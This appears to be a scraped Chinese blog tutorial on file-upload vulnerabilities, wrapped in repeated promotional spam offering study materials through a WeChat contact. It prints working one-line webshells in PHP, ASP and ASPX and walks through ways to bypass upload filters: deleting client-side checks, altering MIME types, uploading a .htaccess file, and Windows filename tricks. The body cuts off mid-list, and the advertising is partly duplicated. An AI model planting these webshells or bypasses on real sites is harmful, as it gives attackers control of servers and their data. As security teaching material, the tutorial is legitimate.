先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
正文
危害:
攻击者可获得网站控制权限
查看、修改、删除网站数据
通过提权漏洞可获得主机权限
二、webshell
1、概念
Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
2、示例
php的一句话木马:
<?php @eval($_POST['pass']);?>
asp的一句话木马:
<%eval request ("pass")%>
aspx的一句话木马:
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
三、所需条件
- 木马上传成功,未被杀
- 知道木马的路径在哪
- 上传的木马能正常运行(解析)
四、绕过
- 判断点1:上传一个非法文件,返回结果是否快,如果返回快,则为客户端检测
- 判断点2:上传一个非图片内容,但是后缀名为图片的文件,是否成功,成功则为黑名单
- 判断点3:上传一个非图片后缀的文件(随便编写的后缀名),上传失败,为白名单
- 判断点4:上传成功后的图片的大小、MD5值等是否发生改变,若改变,则为重新渲染
接下来,将按图上所述分类进行解释
1、JS前端验证
在客户端验证上传的文件是否合法
①源码分析
②绕过
方法一、使用burp直接删除掉JS代码之后就可以绕过JS验证
方法二、利用浏览器的审查工具剔除JS之后,保存为新文件然后进行文件上传
③访问文件
2、MIME-Type验证
服务端MIME类型检测是通过检查http包的Content-Type字段中的值来判断上传文件是否合法。部分网站上传功能只对文件类型做了判断,抓包修改文件类型可绕过限制
常见MIME类型
- 超文本标记语言文本 .html text/html
- xml 文档 .xml text/xml
- 普通文本 .txt text/plain
- RTF 文本 .rtf application/rtf
- PDF 文档 .pdf application/pdf
- Microsoft Word 文件 .word application/msword
- PNG 图像 .png image/png
- GIF 图形 .gif image/gif
- JPEG 图形 .jpeg,.jpg image/jpeg
- au 声音文件 .au audio/basic
- MIDI 音乐文件 mid,.midi audio/midi,audio/x-midi
- RealAudio 音乐文件 .ra, .ram audio/x-pn-realaudio
- MPEG 文件 .mpg,.mpeg video/mpeg
- AVI 文件 .avi video/x-msvideo
- GZIP 文件 .gz application/x-gzip
- TAR 文件 .tar application/x-tar
- 任意的二进制数据 application/octet-stream
①源码分析
如果type不是image/jpeg、image/png、image/gif,则无法成功上传
所以我们需要修改对应的mine-type为以上几个值
②绕过
使用burp抓包后修改
③访问文件
3、后缀检测
1)黑名单与白名单区别
- 基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功
- 基于黑名单验证:只针对黑名单中没有的后缀名,文件才能上传成功
2)黑名单绕过
.htaccess文件绕过
①原理
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
SetHandler application/x-httpd-php
设置当前目录所有文件都使用PHP解析,那么无论上传任何文件,只要文件内容符合PHP语言代码规范,就会被当作PHP执行。不符合则报错。
②前提条件
Apache中如果需要启动 .htaccess,必须在http.conf中设置 AllowOverride
③源码
这里的黑名单中没有.htaccess
那么我们上传.htaccess文件来设置使用php解析任意文件
④上传.htaccess文件
⑤上传file.png后访问
大小写绕过
①原理
- Windows系统下,对于文件名中的大小写不敏感。例如:test.php和TeSt.PHP是一样的
- Linux系统下,对于文件名中的大小写敏感。例如:test.php和 TesT.php就是不一样的
②源码
这里没有对大小写过滤
③上传.pHP文件并访问
空格绕过
①原理
Windows系统下,对于文件名中空格会被作为空处理,程序中的检测代码却不能自动删除空格。从而绕过黑名单
②源码
③上传文件,使用burpsuite抓包后,添加空格
④访问文件
.号绕过
①原理
Windows系统下,文件后缀名最后一个点会被自动去除
②源码
③上传文件,使用burpsuite抓包后,添加.号
④访问文件
特殊符号绕过
①原理
Windows系统下,如果上传的文件名中test.php::$DATA会在服务器上生成一个test.php的文件,其中内容和所上传文件内容相同,并被解析
②源码
③上传文件,使用burpsuite抓包后,添加::$DATA
④访问文件
将::$DATA
路径拼接绕过
①原理
在没有对上传的文件进行重命名的情况下,用户可以自定义文件名并在服务器中上传新建,就会造成对应的绕过黑名单
例如:用户新建 1.php.+空格+.
deldot删除最后一个点之后,不再进行删除,trim删除空格,那么最终上传的文件名为 1.php.利用Windows自动去除最后一个点,导致成功上传1.php
②源码
③上传文件,使用burpsite抓包后修改
④访问文件
双写绕过
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
05d99a.png)
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-3HmjVkq7-1713216837508)]
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!